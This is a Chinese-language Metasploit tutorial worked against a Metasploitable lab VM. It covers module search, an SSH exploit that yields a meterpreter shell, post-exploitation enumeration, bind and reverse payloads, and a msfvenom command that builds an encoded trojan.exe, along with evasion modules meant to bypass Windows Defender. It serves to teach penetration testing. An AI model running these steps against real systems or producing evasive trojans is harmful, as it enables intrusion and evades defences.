一、模块
Metasploit将所有模块进行了分类,分别是Exploits、Auxiliary、Post、Payloads、Encoders、Nops。这些模块都已文件形式保存在系统中,默认保存在Metasploit安装位置的modules目录下。在启动MSF时可以看到这些模块的数量。
leo@kali:~$ msfconsole Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f EFLAGS: 00010046 eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 ds: 0018 es: 0018 ss: 0018 Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) Stack: 90909090990909090990909090 90909090990909090990909090 90909090.90909090.90909090 90909090.90909090.90909090 90909090.90909090.09090900 90909090.90909090.09090900 .......................... cccccccccccccccccccccccccc cccccccccccccccccccccccccc ccccccccc................. cccccccccccccccccccccccccc cccccccccccccccccccccccccc .................ccccccccc cccccccccccccccccccccccccc cccccccccccccccccccccccccc .......................... ffffffffffffffffffffffffff ffffffff.................. ffffffffffffffffffffffffff ffffffff.................. ffffffff.................. ffffffff.................. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00 Aiee, Killing Interrupt handler Kernel panic: Attempted to kill the idle task! In swapper task - not syncing =[ metasploit v5.0.70-dev ] + -- --=[ 1960 exploits - 1094 auxiliary - 336 post ] + -- --=[ 562 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ]
1.查看模块
查看所有模块:
msf5 > show all
查看某个类别模块(以nops为例):
msf5 > show nops NOP Generators ============== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 aarch64/simple normal No Simple 1 armle/simple normal No Simple 2 mipsbe/better normal No Better 3 php/generic normal No PHP Nop Generator 4 ppc/simple normal No Simple 5 sparc/random normal No SPARC NOP Generator 6 tty/generic normal No TTY Nop Generator 7 x64/simple normal No Simple 8 x86/opty2 normal No Opty2 9 x86/single_byte normal No Single Byte
2.搜索模块
我们使用show的时候,如果模块过多,难以找到我们所需的模块,则可以使用search来查找。
例如通过CVE ID来搜索对应的漏洞模块:
msf5 > search CVE-2009-3103 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference 1 auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff normal No Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference 2 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
除了通过CVE ID,还可以通过OSVDB漏洞编号等来搜索。当然也可以通过漏洞的基本信息来搜索,例如作者名、漏洞名、类型等。
3.使用一个渗透攻击模块(Exploit)
选择一个待使用的模块,例如 exploit/multi/ssh/sshexec :
msf5 > use exploit/multi/ssh/sshexec msf5 exploit(multi/ssh/sshexec) >
想重新选择另外的模块,使用 back 命令返回。
使用show info查看该模块信息:
msf5 exploit(multi/ssh/sshexec) > show info Name: SSH User Code Execution # 模块名 Module: exploit/multi/ssh/sshexec # 模块的路径 Platform: Linux, OSX, Unix, Python, BSD # 支持的系统平台 Arch: Privileged: Yes # 特权 License: Metasploit Framework License (BSD) # 许可协议 Rank: Manual # 使用级别 Disclosed: 1999-01-01 # 发布时间 Provided by: Spencer McIntyre Brandon Knight # 作者们 Module side effects: # 模块影响 artifacts-on-disk ioc-in-logs Module stability: # 模块稳定性 crash-safe Module reliability: # 模块可靠性 repeatable-session Available targets: # 可用目标 Id Name -- ---- 0 Linux x86 1 Linux x64 2 Linux armle 3 Linux mipsle 4 Linux mipsbe 5 Linux aarch64 6 OSX x86 7 OSX x64 8 BSD x86 9 BSD x64 10 Python 11 Unix Cmd Check supported: # 是否支持检测 No Basic options: # 基本选项 Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes The password to authenticate with. RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 22 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) USERNAME root yes The user to authenticate as. Payload information: # Payload信息 Space: 800000 Avoid: 0 characters Description: # 描述 This module connects to the target system and executes the necessary commands to run the specified payload via SSH. If a native payload is specified, an appropriate stager will be used. References: https://cvedetails.com/cve/CVE-1999-0502/
其中Basic Options也可以使用show options来查看,这些options都可以使用set命令来设置值,例如:
msf5 exploit(multi/ssh/sshexec) > set RHOSTS 192.168.4.52 RHOSTS => 192.168.4.52 msf5 exploit(multi/ssh/sshexec) > set PASSWORD msfadmin PASSWORD => msfadmin msf5 exploit(multi/ssh/sshexec) > set USERNAME msfadmin USERNAME => msfadmin
如果设置错了,可以使用unset来取消设置,然后重新设置。如果想保存设置的结果(避免每次重复设置,则可以使用 save )。
开始实施渗透攻击:
msf5 exploit(multi/ssh/sshexec) > run # 或者 msf5 exploit(multi/ssh/sshexec) > exploit
msf5 exploit(multi/ssh/sshexec) > exploit [*] Started reverse TCP handler on 192.168.4.146:4444 [*] 192.168.4.52:22 - Sending stager... [*] Command Stager progress - 42.75% done (342/800 bytes) [*] Sending stage (985320 bytes) to 192.168.4.52 [*] Meterpreter session 1 opened (192.168.4.146:4444 -> 192.168.4.52:52490) at 2020-04-26 05:36:44 -0400 [!] Timed out while waiting for command to return [*] Command Stager progress - 100.00% done (800/800 bytes) meterpreter > cd /
可以看到,我们已经渗透攻击成功,获得了meterpreter命令行。
4.后渗透攻击模块(post)
后渗透攻击模块是指在获得meterpreter的Shell之后使用的攻击代码。
例如使用 post/linux/gather/enum_system 模块获取目标主机的系统信息(在上一节获取到meterpreter的基础上):
meterpreter > run post/linux/gather/enum_system [+] Info: [+] _ _ _ _ _ _
____ _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|__
_ | '_ ` _ / _ __/ _` / __| '_ | |/ _ | | __/ _` | '_ | |/ _ __)
|| | | | | | __/ || (_| \__ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____| |_|
Warning: Never expose this VM to an untrusted network!Contact: msfdev[at]metasploit.comLogin with msfadmin/msfadmin to get started [+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux [+] Module running as "msfadmin" user [*] Linux version stored in /root/.msf4/loot/20200426222151_default_192.168.4.52_linux.enum.syste_588979.txt [*] User accounts stored in /root/.msf4/loot/20200426222151_default_192.168.4.52_linux.enum.syste_219956.txt [*] Installed Packages stored in /root/.msf4/loot/20200426222151_default_192.168.4.52_linux.enum.syste_081968.txt [*] Running Services stored in /root/.msf4/loot/20200426222151_default_192.168.4.52_linux.enum.syste_539733.txt [*] Cron jobs stored in /root/.msf4/loot/20200426222151_default_192.168.4.52_linux.enum.syste_196404.txt [*] Disk info stored in /root/.msf4/loot/20200426222151_default_192.168.4.52_linux.enum.syste_532704.txt [*] Logfiles stored in /root/.msf4/loot/20200426222151_default_192.168.4.52_linux.enum.syste_968585.txt [*] Setuid/setgid files stored in /root/.msf4/loot/20200426222151_default_192.168.4.52_linux.enum.syste_645631.txt
可以看到,msf帮我们将目标机器操作系统的信息保存到了对应的文件中。
5.攻击载荷(payloads)
payload是指对目标系统攻击成功后执行的代码,例如用来创建一个meterpreter连接或是绑定一个端口来等待攻击机连接,获取Shell交互。
在我们选择了exploit攻击模块后,然后set payload:
msf5 exploit(multi/ssh/sshexec) > set payload linux/x86/shell/bind_tcp payload => linux/x86/shell/bind_tcp
然后和前面一样,设置好目标机器的IP、端口、用户名密码等Basic Options,就可以了。
msf5 exploit(multi/ssh/sshexec) > run [*] 192.168.4.52:22 - Sending stager... [*] Command Stager progress - 40.05% done (306/764 bytes) [!] Timed out while waiting for command to return [*] Command Stager progress - 100.00% done (764/764 bytes) [*] Started bind TCP handler against 192.168.4.52:4444 [*] Sending stage (36 bytes) to 192.168.4.52 [*] Command shell session 2 opened (192.168.4.146:40521 -> 192.168.4.52:4444) at 2020-04-27 00:21:09 -0400 cd / ls -l total 81 drwxr-xr-x 2 root root 4096 May 13 2012 bin drwxr-xr-x 4 root root 1024 May 13 2012 boot lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom drwxr-xr-x 13 root root 13820 Apr 23 23:40 dev drwxr-xr-x 94 root root 4096 Apr 26 04:24 etc drwxr-xr-x 6 root root 4096 Apr 16 2010 home drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server drwxr-xr-x 13 root root 4096 May 13 2012 lib drwx------ 2 root root 16384 Mar 16 2010 lost+found drwxr-xr-x 4 root root 4096 Mar 16 2010 media drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt -rw------- 1 root root 6542 Apr 23 23:40 nohup.out drwxr-xr-x 2 root root 4096 Mar 16 2010 opt dr-xr-xr-x 119 root root 0 Apr 23 23:40 proc drwxr-xr-x 13 root root 4096 Apr 23 23:40 root drwxr-xr-x 2 root root 4096 May 13 2012 sbin drwxr-xr-x 2 root root 4096 Mar 16 2010 srv drwxr-xr-x 12 root root 0 Apr 23 23:40 sys drwxrwxrwt 6 root root 4096 Apr 26 04:40 tmp drwxr-xr-x 12 root root 4096 Apr 28 2010 usr drwxr-xr-x 14 root root 4096 Mar 17 2010 var lrwxrwxrwx 1 root root 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
6.NOPs模块
NOPs的全称是:No Operation or Next Operation sled。
当我们的payload在经过一些IDS/IPS设备时,其中的一些特殊字符( NOPS x90x90... ,例如 while(true); 的分号)可能会被拦截,从而导致攻击失效。
NOPS模块就是利用ruby脚本将这些特殊字符进行转换,从而绕过IDS/IPS的拦截。
针对不同类型的payload,会有不同的NOPS操作,例如php实现的payload:
class MetasploitModule < Msf::Nop def initialize super( 'Name' => 'PHP Nop Generator', 'Alias' => 'php_generic', 'Description' => 'Generates harmless padding for PHP scripts', 'Author' => 'hdm', 'License' => MSF_LICENSE, 'Arch' => ARCH_PHP) end # Generate valid PHP code up to the requested length def generate_sled(length, opts = {}) # Default to just spaces for now " " * length end end
该ruby脚本用于处理php实现的payload中的特殊字符,只需要将其替换为一串空格即可。而针对其他的payload可能操作不一样。
MSF一共提供了10个NOPS模块(其中x86中有2个):
oot@kali:/usr/share/metasploit-framework/modules/nops# tree
.
├── aarch64
│ └── simple.rb
├── armle
│ └── simple.rb
├── mipsbe
│ └── better.rb
├── php
│ └── generic.rb
├── ppc
│ └── simple.rb
├── sparc
│ └── random.rb
├── tty
│ └── generic.rb
├── x64
│ └── simple.rb
└── x86
├── opty2.rb
└── single_byte.rb
7.Encoders模块
编码模块主要是供msfvenom工具进行编码时使用,通过多重编码,实现木马免杀。
msf支持的编码模块:
msf5 > show encoders Encoders ======== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 cmd/brace low No Bash Brace Expansion Command Encoder 1 cmd/echo good No Echo Command Encoder 2 cmd/generic_sh manual No Generic Shell Variable Substitution Command Encoder 3 cmd/ifs low No Bourne ${IFS} Substitution Command Encoder 4 cmd/perl normal No Perl Command Encoder 5 cmd/powershell_base64 excellent No Powershell Base64 Command Encoder ... ... ... 41 x86/single_static_bit manual No Single Static Bit 42 x86/unicode_mixed manual No Alpha2 Alphanumeric Unicode Mixedcase Encoder 43 x86/unicode_upper manual No Alpha2 Alphanumeric Unicode Uppercase Encoder 44 x86/xor_dynamic normal No Dynamic key XOR Encoder
以x86/shikata_ga_nai为例:
msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.4.142 --platform windows -a x86 -e x86/shikata_ga_nai -f exe > trojan.exe
这样就生成了一个exe格式的木马程序,并且通过 x86/shikata_ga_nai 编码,payload是 windows/meterpreter/bind_tcp 。
8.Plugins插件
Metasploit提供了插件接口,可以在MSF中使用Nessus、OpenVAS、Sqlmap等第三方软件。
我们通过查看目录 /usr/share/metasploit-framework/plugins 可以看到:
root@kali:/usr/share/metasploit-framework/plugins# ls aggregator.rb event_tester.rb msfd.rb request.rb sounds.rb wmap.rb alias.rb ffautoregen.rb msgrpc.rb rssfeed.rb sqlmap.rb auto_add_route.rb ips_filter.rb nessus.rb sample.rb thread.rb beholder.rb komand.rb nexpose.rb session_notifier.rb token_adduser.rb db_credcollect.rb lab.rb openvas.rb session_tagger.rb token_hunter.rb db_tracker.rb libnotify.rb pcap_log.rb socket_logger.rb wiki.rb
如果我们想自己创建插件,或者从第三方获取。则将获取到的脚本文件复制到/root/.msf4/plugins中,然后重启Metasploit即可使用。
使用以下命令查看已加载的插件:
load -s
加载要使用的插件:
load openvas
查看插件的帮助:
help openvas
卸载插件:
unload openvas
9.规避模块(Evasion)
这个模块是Metasploit 5版本提供的,用于规避例如windows defender防火墙等。
查看所有规避模块:
msf5 > show evasion evasion ======= # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 windows/applocker_evasion_install_util normal No Applocker Evasion - .NET Framework Installation Utility 1 windows/applocker_evasion_msbuild normal No Applocker Evasion - MSBuild 2 windows/applocker_evasion_presentationhost normal No Applocker Evasion - Windows Presentation Foundation Host 3 windows/applocker_evasion_regasm_regsvcs normal No Applocker Evasion - Microsoft .NET Assembly Registration Utility 4 windows/applocker_evasion_workflow_compiler normal No Applocker Evasion - Microsoft Workflow Compiler 5 windows/windows_defender_exe normal No Microsoft Windows Defender Evasive Executable 6 windows/windows_defender_js_hta normal No Microsoft Windows Defender Evasive JS.Net and HTA
这里以 windows/windows_defender_exe 为例:
msf5 evasion(windows/windows_defender_exe) > show options Module options (evasion/windows/windows_defender_exe): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME yes Filename for the evasive file (default: random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.4.146 yes The listen address (an interface may be specified) LPORT 8443 yes The listen port Evasion target: Id Name -- ---- 0 Microsoft Windows
可以看到,该规避模块中默认使用payload为 windows/meterpreter/reverse_tcp 。当然我们也可以另外指定payload,只需要使用 set payload xxxx 设置即可。
使用默认名称和默认payload生成规避文件:
msf5 > use windows/windows_defender_exe msf5 evasion(windows/windows_defender_exe) > run [*] Compiled executable size: 4608 [+] azj.exe stored at /root/.msf4/local/azj.exe
这里没有设置文件名参数,随机生成了azj.exe,我们也可以指定文件名:
msf5 evasion(windows/windows_defender_exe) > set FILENAME leo.exe FILENAME => leo.exe msf5 evasion(windows/windows_defender_exe) > run [*] Compiled executable size: 3584 [+] leo.exe stored at /root/.msf4/local/leo.exe
这样,我们的payload程序外面就包了一层规避程序壳,可能可以绕过windows defender的检测(windows10没绕过)。
二、模块扩展
1.导入第三方模块
第三方模块搜索网站:https://www.exploit-db.com/
===